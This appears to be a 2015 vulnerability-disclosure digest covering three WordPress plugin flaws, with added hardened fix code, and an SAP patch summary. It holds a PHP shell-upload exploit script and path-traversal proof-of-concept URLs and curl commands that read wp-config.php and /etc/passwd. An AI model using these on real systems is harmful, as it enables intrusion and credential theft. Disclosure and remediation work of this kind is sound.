Friday, 12 June 2015
WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload

Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta WordPress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php: an unauthenticated user can upload any file to the system, including a .php file. upload.php does not check that the user is authenticated, so a simple POST allows arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn't check for an authenticated WordPress user:

<?php

$filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
if (file_exists($filename)) {
    include_once($filename);
} else {
    include_once("../../../../wp-load.php");
}
echo "Here";
$image_file = $_FILES['gf_aviary_file'];
if($image_file['name']!=''){
    $max_file_size = 4*1024*1024;
    $file_size = intval($image_file['size']);
    if( $file_size > $max_file_size ){
        $msg = "File Size is too big.";
        $error_flag = true;
    }
    $extension = strtolower(end(explode('.', $image_file['name'])));
    $aa_options = get_option('gf_aa_options');
    $supported_files = $aa_options['supported_file_format'];
    $supported_files = strtolower($supported_files);
    if(!$error_flag && $supported_files != '' ){
        $supported_files = explode (',', $supported_files);
        if(!in_array($extension, $supported_files)){
            $msg = "No Supported file.";
            $error_flag = true;
        }
    }
    if(!$error_flag){
        $wp_upload_dir = wp_upload_dir();
        if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
            mkdir($wp_upload_dir['basedir'].'/gform_aviary');
        }
        $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
        $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
        $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        if(move_uploaded_file($image_file['tmp_name'], $file_name)){
            $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        }
    }
    $return_obj = array('status' => 'success', 'message' => $file_url);
    echo json_encode($return_obj);
}
?>
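
A hardened replacement for the upload handler above, added here as an illustration; it is not code from the plugin or from the advisory. It assumes the WordPress API is loaded from the same relative wp-load.php path, that uploads must come from a logged-in user with the upload_files capability carrying a nonce under the assumed action name gf_aviary_upload, and that only image types are acceptable regardless of the plugin option (the original code skips its extension check entirely when that option is empty, and never initializes $error_flag).

```php
<?php
// Added example, not the plugin's code: hardened upload.php. Assumed names:
// field 'gf_aviary_file', nonce action 'gf_aviary_upload', dir 'gform_aviary'.
require_once dirname(__FILE__) . '/../../../../wp-load.php';

function gf_aviary_fail($message, $code = 403) {
    status_header($code);
    echo json_encode(array('status' => 'error', 'message' => $message));
    exit;
}

// 1. Require an authenticated user who may upload, plus a nonce so another
//    site cannot trigger the upload through the user's browser (CSRF).
if (!is_user_logged_in() || !current_user_can('upload_files')) {
    gf_aviary_fail('Authentication required.');
}
check_ajax_referer('gf_aviary_upload', '_wpnonce');

if (empty($_FILES['gf_aviary_file']) || $_FILES['gf_aviary_file']['error'] !== UPLOAD_ERR_OK) {
    gf_aviary_fail('No file received.', 400);
}
$image_file = $_FILES['gf_aviary_file'];

// 2. Size limit and a fixed image allowlist verified by content, not only by
//    the client-supplied name (the original trusted the name's last extension
//    and skipped the check when 'supported_file_format' was empty).
if ((int) $image_file['size'] > 4 * 1024 * 1024) {
    gf_aviary_fail('File size is too big.', 400);
}
$mimes = array('jpg|jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif');
$check = wp_check_filetype_and_ext($image_file['tmp_name'], $image_file['name'], $mimes);
if (empty($check['ext']) || empty($check['type'])) {
    gf_aviary_fail('Unsupported file type.', 400);
}

// 3. Build the destination only from sanitized parts: a numeric field id and
//    a sanitized base name carrying the verified extension.
$field_id = absint(isset($_POST['gf_aviary_field_id']) ? $_POST['gf_aviary_field_id'] : 0);
$base     = sanitize_file_name(pathinfo($image_file['name'], PATHINFO_FILENAME)) . '.' . $check['ext'];
$uploads  = wp_upload_dir();
$dir      = trailingslashit($uploads['basedir']) . 'gform_aviary/';
wp_mkdir_p($dir);
if (!move_uploaded_file($image_file['tmp_name'], $dir . $field_id . '_' . $base)) {
    gf_aviary_fail('Could not store the file.', 500);
}
$url = trailingslashit($uploads['baseurl']) . 'gform_aviary/' . $field_id . '_' . $base;
echo json_encode(array('status' => 'success', 'message' => $url));
```

Pairing this with a web-server rule that refuses to execute scripts under wp-content/uploads limits the impact of any remaining bypass.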

CVE ID: CVE-2015-4455
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
WordPress History Collection <=1.1.1 Arbitrary File Download

# Exploit Title: WordPress History Collection <=1.1.1 Arbitrary File Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

1. Description:
The WordPress History Collection plugin contains a file, download.php, which does not filter its GET input and then uses that value to force the download of a file (download.php, line 44):
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
2. Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"
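
A path-confining download handler for the download.php issue described above, added as an example that is not the plugin's own code. It assumes the var parameter from the proof of concept and a plugin-owned directory under wp-content/uploads/history-collection (an assumed location); anything that resolves outside that directory, including through symlinks, is refused.

```php
<?php
// Added example, not the plugin's code: a download.php that confines the
// requested file to one directory. Assumed: parameter 'var' (from the PoC)
// and the plugin-owned directory wp-content/uploads/history-collection.
require_once dirname(__FILE__) . '/../../../wp-load.php';

function hc_resolve_download($allowed_dir, $requested) {
    // Accept only a bare file name: no separators, no traversal, no null byte.
    if (!is_string($requested) || $requested === '' || $requested === '.' || $requested === '..') {
        return false;
    }
    if (preg_match('#[/\\\\\0]#', $requested)) {
        return false;
    }
    // realpath() resolves '..' and symlinks; the result must still sit below
    // $allowed_dir (the trailing separator guards against a sibling directory
    // that merely shares the prefix).
    $path = realpath($allowed_dir . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return false;
    }
    if (strpos($path, $allowed_dir . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

$uploads     = wp_upload_dir();
$allowed_dir = realpath(trailingslashit($uploads['basedir']) . 'history-collection');
$path = ($allowed_dir !== false && isset($_GET['var']))
    ? hc_resolve_download($allowed_dir, $_GET['var'])
    : false;
if ($path === false) {
    status_header(404);          // same answer for missing and forbidden
    exit('File not found.');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```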

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
Paypal Currency Converter Basic For Woocommerce File Read

# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (it is read, not included, so it is not executed as PHP). Any HTML file can therefore be loaded, and an attacker may be able to read any local file that the server does not execute.

Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

POC:
curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
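
A replacement for proxy.php, added as an example that is not the plugin's code: it assumes the requrl parameter from the advisory and www.paypal.com as the only permitted upstream host, and it fetches through the WordPress HTTP API, which does not open local paths. The snippet extraction keeps the two markers from the original but takes the length as the distance between them (the original used strlen() minus the second marker's offset).

```php
<?php
// Added example, not the plugin's code: proxy.php restricted to one HTTPS host.
// Assumed: parameter 'requrl' (from the advisory) and www.paypal.com as the
// only permitted upstream host.
require_once dirname(__FILE__) . '/../../../wp-load.php';

function pcc_allowed_url($url, array $allowed_hosts) {
    // A bare path such as /etc/passwd parses with no scheme or host, which
    // is exactly what let file_get_contents() read local files.
    $parts = is_string($url) ? parse_url($url) : false;
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return false;
    }
    if (!in_array(strtolower($parts['host']), $allowed_hosts, true)) {
        return false;
    }
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return false;
    }
    return $url;
}

function pcc_extract_result($html) {
    // Cut between the two markers; length is the distance between them.
    $left  = strpos($html, '<div id=currency_converter_result>');
    $right = strpos($html, '<input type=hidden name=meta');
    if ($left === false || $right === false || $right <= $left) {
        return '';
    }
    return substr($html, $left, $right - $left);
}

$url = isset($_GET['requrl']) ? pcc_allowed_url($_GET['requrl'], array('www.paypal.com')) : false;
if ($url === false) {
    status_header(400);
    exit('Invalid request URL.');
}
// The WordPress HTTP API does not open local paths; redirects are disabled so
// the allowlisted host cannot bounce the request to an internal address.
$response = wp_remote_get($url, array('redirection' => 0, 'timeout' => 10));
if (is_wp_error($response) || 200 !== (int) wp_remote_retrieve_response_code($response)) {
    status_header(502);
    exit('Upstream request failed.');
}
echo wp_kses_post(pcc_extract_result(wp_remote_retrieve_body($response)));
```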
SAP XXE / Hardcoded Credentials / SQL Injection / Overflow

Published: 2015.06.12
Credit: Darya Maenkova
Risk: Medium
CWE: CWE-89
CVE: N/A
Local: No
Remote: Yes

SAP <http://www.sap.com/> has released the monthly critical patch update
for June 2015. This patch update closes a lot of vulnerabilities in SAP
products. The most common vulnerability type is Missing Authorization Check.
This month, three critical vulnerabilities found by ERPScan researchers
Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.

*Issues that were patched with the help of ERPScan*

Below are the details of the SAP vulnerabilities that were found by ERPScan
<http://www.erpscan.com/> researchers.

* An XML eXternal Entity vulnerability in SAP Mobile Platform
on-premise (CVSS Base Score: 5.5). An update is available in SAP Security
Note 2159601 <https://service.sap.com/sap/support/notes/2159601>. An
attacker can use XML eXternal Entities to send specially crafted
unauthorized XML requests, which will be processed by the XML
parser. The attacker will get unauthorized access to the OS file system.
* A Hardcoded Credentials vulnerability in SAP Cross-System Tools
(CVSS Base Score: 3.6). An update is available in SAP Security Note 2059659
<https://service.sap.com/sap/support/notes/2059659>. An attacker can
use the hardcoded credentials for unauthorized access and perform
various actions in the system. In addition, such code is likely to
function as a backdoor into the system.
* A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench
(CVSS Base Score: 2.1). An update is available in SAP Security Note 2057982
<https://service.sap.com/sap/support/notes/2057982>. An attacker can
use the hardcoded credentials for unauthorized access and perform
various actions in the system. In addition, such code is likely to
function as a backdoor into the system.


*The most critical issues found by other researchers*

Some of our readers and clients asked us to categorize the most critical
SAP vulnerabilities to patch them first. Companies providing SAP
Security Audit, SAP Security Assessment, or SAP Penetration Testing
services can include these vulnerabilities in their checklists. The most
critical vulnerabilities of this update can be patched by the following
SAP Security Notes:

* 2151237 <https://service.sap.com/sap/support/notes/2151237>: SAP GUI
for Windows has a Buffer Overflow vulnerability (CVSS Base
Score: 9.3). An attacker can use the buffer overflow to inject
specially crafted code into working memory, which will be executed
by the vulnerable application with the privileges of that
application. This can lead to the attacker taking complete control
over the application, denial of service, command execution, and
other attacks. In the case of command execution, the attacker can obtain
critical technical and business-related information stored in the
vulnerable SAP system or escalate their own privileges. In the case of
denial of service, the process of the vulnerable component may be
terminated. While it is down, nobody can use the service, which
negatively affects business processes, causes system downtime and,
consequently, damages business reputation. It is recommended to install
this SAP Security Note to prevent risks.
* 2129609 <https://service.sap.com/sap/support/notes/2129609>: SAP EP
JDBC Connector has an SQL Injection vulnerability (CVSS Base
Score: 6.5). An attacker can exploit the SQL injection with
specially crafted SQL queries. They can read and modify sensitive
information in a database, execute administrative operations in the
database, and destroy data or make it unavailable. In some cases, an
attacker can access system data or execute OS commands. It is
recommended to install this SAP Security Note to prevent risks.
* 1997734 <https://service.sap.com/sap/support/notes/1997734>: SAP RFC
runtime has a Missing Authorization Check vulnerability (CVSS Base
Score: 6.0). An attacker can use the missing authorization check to
access a service without any authorization procedure and use
service functionality that has restricted access. This can lead to
information disclosure, privilege escalation, and other attacks. It
is recommended to install this SAP Security Note to prevent risks.
* 2163306 <https://service.sap.com/sap/support/notes/2163306>: SAP
CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK
(CVE-2015-0204, CVSS Base Score: 5.0). It allows an attacker to
intercept HTTPS connections between vulnerable clients and servers
and force them to use weakened encryption, which the attacker can
break to steal or manipulate sensitive data. These attacks assume a
network adversary (a man-in-the-middle) able to tamper with TLS
handshake messages. The typical way to obtain that position is by
tampering with the Domain Name System (DNS), for example via DNS
rebinding or domain name seizure. The attack targets a class of
deliberately weak export cipher suites. It is recommended to install
this SAP Security Note to prevent risks.


*References about the FREAK vulnerability:*

* SMACK: State Machine AttaCKs <https://www.smacktls.com/>
* Tracking the FREAK Attack <https://freakattack.com/>
* CVE-2015-0204
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>


It is highly recommended to patch all these SAP vulnerabilities to
prevent business risks affecting your SAP systems.

SAP has traditionally thanked the ERPScan security researchers for the
vulnerabilities they found on its acknowledgment page
<http://scn.sap.com/docs/DOC-8218>.

Advisories for these SAP vulnerabilities with technical details will be
available in 3 months on erpscan.com <http://www.erpscan.com/>.

--

Darya Maenkova

PR manager


------------------------------------------------------------------------

e-mail: d.maenkova@erpscan.com <mailto:d.maenkova@erpscan.com>

address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

phone: 650.798.5255

erpscan.com <http://erpscan.com>